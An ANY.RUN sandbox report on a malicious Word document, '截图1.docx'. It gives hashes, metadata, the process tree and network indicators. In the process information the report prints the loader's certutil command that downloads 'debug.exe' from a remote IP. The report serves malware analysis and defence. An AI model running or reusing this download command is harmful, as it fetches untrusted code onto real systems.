analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

截图1.docx

Full analysis: https://app.any.run/tasks/b04202c2-7d09-405a-82b4-082ac744f16f
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: May 24, 2019, 16:01:09
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
ole-embedded
loader
Indicators:
MIME: application/vnd.openxmlformats-officedocument.wordprocessingml.document
File info: Microsoft Word 2007+
MD5:

BC226657CF8768585FFFBE057510D082

SHA1:

0C582DF2120F4DC94EEE72573B9A3D3C9EF87D1F

SHA256:

489310F5F63045A83251C4F457D2BAA4B0C57E5EE7B3D147EE63913352A2C7F1

SSDEEP:

384:aWUB/2pqrEmsL3tj8v55nvIYuveW83CrIQ8EmmzDV:aXEDL9jinwYuL83Crx8vUV

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2912)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2912)
    • Starts CertUtil for downloading files

      • cmd.exe (PID: 3444)
  • SUSPICIOUS

    No suspicious indicators.
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2912)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2912)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.docx | Word Microsoft Office Open XML Format document (52.2)
.zip | Open Packaging Conventions container (38.8)
.zip | ZIP compressed archive (8.8)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0006
ZipCompression: Deflated
ZipModifyDate: 1980:01:01 00:00:00
ZipCRC: 0x24886c04
ZipCompressedSize: 373
ZipUncompressedSize: 1460
ZipFileName: [Content_Types].xml

XMP

Title: -
Subject: -
Creator: Dell_20170514745
Description: -

XML

Keywords: -
LastModifiedBy: Dell_20170514745
RevisionNumber: 2
CreateDate: 2019:05:19 05:16:00Z
ModifyDate: 2019:05:19 05:17:00Z
Template: Normal.dotm
TotalEditTime: 1 minute
Pages: 1
Words: 14
Characters: 80
Application: Microsoft Office Word
DocSecurity: None
Lines: 1
Paragraphs: 1
ScaleCrop: No
Company: -
LinksUpToDate: No
CharactersWithSpaces: 93
SharedDoc: No
HyperlinksChanged: No
AppVersion: 16
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
36
Monitored processes
3
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs cmd.exe no specs certutil.exe

Process information

PID
CMD
Path
Indicators
Parent process
2912"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\截图1.docx"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3444cmd /c ""C:\Users\admin\AppData\Local\Temp\info.bat" "C:\Windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
2149122452
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3344certutil -urlcache -split -f http://137.59.18.154/debug.exe C:\Windows\system32\certutil.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
CertUtil.exe
Exit code:
2149122452
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 446
Read events
794
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
0
Text files
2
Unknown types
3

Dropped files

PID
Process
Filename
Type
2912WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRE40.tmp.cvr
MD5:
SHA256:
2912WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8F49E487.emfemf
MD5:144D85808AF23322C03F65D0B3D52B80
SHA256:23F45083F326DF7E2E1F8D61FBE1C2B1920D85C30452DD9D5E22B4400637FB06
2912WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:5AB8FDB550CEF33A41135907EDACEA21
SHA256:B313EC3B7731E49E8197F3027D1E9BB7650F7DE250BEC72E876D9FBE7B5D72C8
2912WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$截图1.docxpgc
MD5:DAADBEF45F7C00E1A2C6D7A518C4F706
SHA256:0EA0486C818882FF4A0C7FA2D55A40C464D5A1E30C1279253DE12E4723F38A9D
2912WINWORD.EXEC:\Users\admin\AppData\Local\Temp\info.battext
MD5:CFAE91D51BA48F1AEC65D264D44AFADD
SHA256:1AC0E1EE22ACE54276054EA8333CCB34BBD5FC7E6E4ABA650AA4935A26870BDD
3344certutil.exeC:\Users\admin\AppData\Local\Temp\debug.exehtml
MD5:BF008299D141F2A37CA90ECB01A3A3FC
SHA256:F975DD912BBE0E390E4C9376088BA16BCF13C75FF65813523207FE576E6E437D
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
0
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3344
certutil.exe
GET
404
137.59.18.154:80
http://137.59.18.154/debug.exe
HK
html
286 b
suspicious
3344
certutil.exe
GET
404
137.59.18.154:80
http://137.59.18.154/debug.exe
HK
html
286 b
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3344
certutil.exe
137.59.18.154:80
Xima Network
HK
suspicious

DNS requests

No data

Threats

PID
Process
Class
Message
3344
certutil.exe
A Network Trojan was detected
ET INFO Executable Download from dotted-quad Host
3344
certutil.exe
A Network Trojan was detected
ET INFO Executable Download from dotted-quad Host
3344
certutil.exe
Misc activity
SUSPICIOUS [PTsecurity] Observed MS Certutil User-Agent in HTTP Request
2 ETPRO signatures available at the full report
No debug info